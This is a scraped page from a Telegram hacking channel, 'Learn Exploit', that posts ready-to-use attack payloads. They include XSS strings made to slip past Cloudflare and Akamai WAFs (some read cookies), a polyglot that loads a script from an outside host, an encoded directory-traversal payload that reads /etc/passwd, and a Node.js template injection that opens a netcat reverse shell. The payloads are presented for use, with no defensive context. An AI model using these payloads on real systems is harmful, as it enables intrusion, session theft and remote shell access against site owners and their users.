0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection ⚡️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE
💎

#rce #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
short XSS polyglot

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Stored XSS via cache poisoning ⚡️

"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">


#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK

#Bypass #Payload
——————‌
@Learnexploit
@A3l3_KA4 💎
A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM